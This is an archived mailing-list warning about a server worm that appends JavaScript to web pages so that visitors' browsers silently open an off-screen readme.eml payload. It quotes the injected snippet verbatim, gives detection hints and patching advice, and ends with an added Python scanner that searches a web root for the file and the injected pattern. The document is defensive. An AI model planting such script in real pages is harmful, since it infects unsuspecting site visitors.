No subject


Tue Jun 4 12:17:20 MDT 2013


===================================================

Even worse, this virus can be spread to users who simply surf to a web page
on an infected server. A javascript is added to web pages served on infected
servers, and this script launches a readme.eml file, which Internet Explorer
then opens and executes.

The code appended to infected web pages is:

<!-- BEGIN

<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000 ")</script></html>

-->

Readme.eml contains the virus payload, and is launched via JavaScript in a
window at X6000 Y6000, i.e., way off your screen so you can't see it. A
quick, unproven workaround seems to be to associate .eml files with Notepad.
IE still opens the new window, however, and I'm not certain if this is
enough to infect.

Note that an infected web server will have a "readme.eml" file on the server
in root. That's a good way to check if your NT server is infected, I would
think.

This server worm uses exploits that have had patches for some time now. If
you run Windows, you need to go to windowsupdate.com to make sure you are up
to date with patches.

=====================================================
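
The two checks described in the message above (a "readme.eml" file on the server, and pages with the window.open("readme.eml") script appended) can be swept for across a web root. This is an added example, not part of the original message; the function names, the list of page extensions and the 4 KB tail size are assumptions, and the sample files are constructed.

```python
import os
import re
import tempfile

# Matches the appended snippet quoted in the message: a window.open() call whose
# first argument is "readme.eml", tolerating whitespace, line breaks and quote style.
INJECTED = re.compile(rb'window\.open\s*\(\s*["\']readme\.eml["\']', re.IGNORECASE)
# Assumption: which extensions count as served pages; adjust for the server.
PAGE_EXTS = {".htm", ".html", ".asp"}
TAIL_BYTES = 4096  # the message says the code is appended, so inspect the file tail

def scan_webroot(root):
    """Return (dropped, injected): readme.eml paths and pages carrying the script."""
    dropped, injected = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() == "readme.eml":
                dropped.append(path)
                continue
            if os.path.splitext(name)[1].lower() not in PAGE_EXTS:
                continue
            try:
                with open(path, "rb") as fh:
                    fh.seek(0, os.SEEK_END)
                    fh.seek(max(0, fh.tell() - TAIL_BYTES))
                    tail = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if INJECTED.search(tail):
                injected.append(path)
    return sorted(dropped), sorted(injected)

def build_sample(root):
    """Constructed sample web root: clean page, tampered page, empty readme.eml."""
    snippet = (b'<html><script language="JavaScript">window.open("readme.eml", null,\n'
               b'"resizable=no,top=6000,left=6000 ")</script></html>\n')
    samples = {"index.html": b"<html><body>ok</body></html>\n",
               "news.HTM": b"<html><body>news</body></html>\n" + snippet,
               "readme.eml": b""}  # empty stand-in, name only
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(scan_webroot(tmp))
```

Point scan_webroot() at the server's document root; any path in either list marks a file to inspect by hand before the server is trusted again.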


